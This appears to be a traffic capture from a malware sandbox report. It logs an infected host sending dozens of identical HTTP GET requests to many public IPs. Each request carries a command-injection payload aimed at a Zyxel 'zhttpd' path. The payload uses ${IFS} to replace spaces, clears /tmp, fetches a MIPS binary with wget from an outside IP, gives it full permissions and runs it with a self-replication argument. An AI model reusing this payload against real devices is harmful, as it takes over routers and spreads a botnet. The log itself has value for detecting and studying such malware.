                                                Jan 12, 2024 18:23:52.301513910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.133524498.209.100.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301606894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.1339130169.57.1.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301667929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.1335730221.250.22.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301683903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.133478284.211.84.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301696062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.1344926183.38.94.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301696062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.133558837.243.186.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301758051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.135329071.242.99.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301826000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.1357900152.26.90.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301829100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.1357852154.142.224.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301831007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.133367051.151.219.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301846981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.1344386174.126.33.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301913977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.1348156136.160.240.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301990032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.1333526178.3.170.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.301996946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.133859432.86.164.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302026987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.1353250201.146.173.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302051067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.1338780116.196.9.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302067041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.1357332171.154.104.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302125931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.1334180204.119.40.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302138090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.135368223.144.255.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302151918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.1351730189.95.27.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302154064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.133672824.194.189.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302268028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.1344988164.146.214.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302289009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.135425012.172.196.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302298069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.133723252.202.54.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302299023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.135639212.155.231.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302345037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.134045277.85.137.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302346945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.1338020134.122.178.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302431107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.135275025.3.55.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302433014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.134330635.192.50.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302504063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.135955268.208.64.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302512884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.1336836125.158.118.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302534103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.134942644.13.50.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302536964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.134612687.205.172.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302542925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.1333114170.31.225.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302591085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.1337028149.73.178.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302651882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.1360632208.145.102.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302669048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.1352174113.138.180.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302670002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.1349324178.227.33.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302670002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.1345840111.142.7.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302685976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.1348560132.208.44.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302705050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.1357264157.29.63.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302783966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.135381640.19.228.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302840948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.1357932103.48.32.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302851915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.1352804150.70.90.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302867889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.134739273.199.78.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302892923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.1349194191.181.127.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302900076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.1336288121.214.94.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302917957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.1345696217.68.15.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302982092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.13360682.195.107.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.302999973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.134567063.165.148.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303030014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.135459665.64.62.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303145885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.1354690207.183.8.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303163052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.133539049.20.229.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303152084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.1344358145.23.128.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303168058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.1340382146.130.34.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303168058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.1333132145.67.25.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303163052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.1336916135.137.158.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303173065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.133812847.113.137.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303286076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.134535613.77.72.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303288937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.1348956166.110.252.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303359032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.1340348201.115.12.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303451061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.135128035.76.10.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.303452015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                139192.168.2.1358460209.76.161.57443
                                                TimestampBytes transferredDirectionData
